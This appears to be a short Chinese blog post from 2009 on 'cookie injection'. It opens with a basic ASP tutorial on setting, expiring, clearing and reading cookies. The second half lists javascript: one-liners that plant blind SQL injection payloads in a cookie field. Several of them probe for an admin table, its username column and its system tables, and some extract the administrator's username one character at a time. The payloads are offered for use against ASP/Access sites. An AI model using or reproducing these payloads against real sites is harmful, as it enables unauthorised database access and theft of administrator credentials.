分类: Python/Ruby
2009-08-08 11:38:54
Cookies注入:
1.如何写入Cookies? Response.Cookies("字段名")=变量或字符串,例如: Response.Cookies("name2")="Dingdang" 2.如何设置Cookies时间? Response.Cookies("字段名").expires=时间函数+N,例如: Response.Cookies("name2").expires=date+1,表示Cookies保存1天,再比如: Response.Cookies("name2").expires=Hour+8,表示Cookies保存8小时。 3.在以往的ASP教程中,很少有介绍Cookies退出的方法。在“退出”这个ASP页中可以这样写: Response.Cookies("字段名")="" 之后,在客户端的浏览器就清除了Cookies,并且Cookies文件会消失。注意有多少个字段,就要写多少句来清除。 4.如何读取Cookies? 变量名=Request.Cookies("字段名"),例如: name2=Request.Cookies("name2") 如果网页中写入<%=name2%>这句,则会显示“Dingdang”。 也可以这样直接读取Cookies,<%=Request.Cookies("name2")%> Cookies是属于Session对象的一种。但有不同,Cookies不会占服务器资源;而“Session”则会占用服务器资源。所以,尽量不要使用Session,而使用Cookies。 指令: javascript:alert(document.cookie="id="+escape("156 and 1=1")); javascript:alert(document.cookie="id="+escape("26 and (select count(*) from admin)>0")); //猜是否有admin表 javascript:alert(document.cookie="id="+escape("26 and (select count(username) from admin)>0")); //猜是否有username表 javascript:alert(document.cookie="id="+escape("40 and (select len(username) from admin)=5")); //看管理员密码是否是5位 javascript:alert(document.cookie="id="+escape("26 and (select top 1 asc(mid(username,1,1)) from admin)=97")); //第一位是否是ASC码97,相当于a javascript:alert(document.cookie="targetID="+escape("108 and (select top 1 unicode(substring(user,3,1)) from admin)=111")); javascript:alert(document.cookie="id="+escape("26 and (select top 1 asc(mid(username,2,1)) from admin)=97")); //第二位 javascript:alert(document.cookie="targetID="+escape("108 and (select count(*) from msysobjects)>0")); //看系统表 |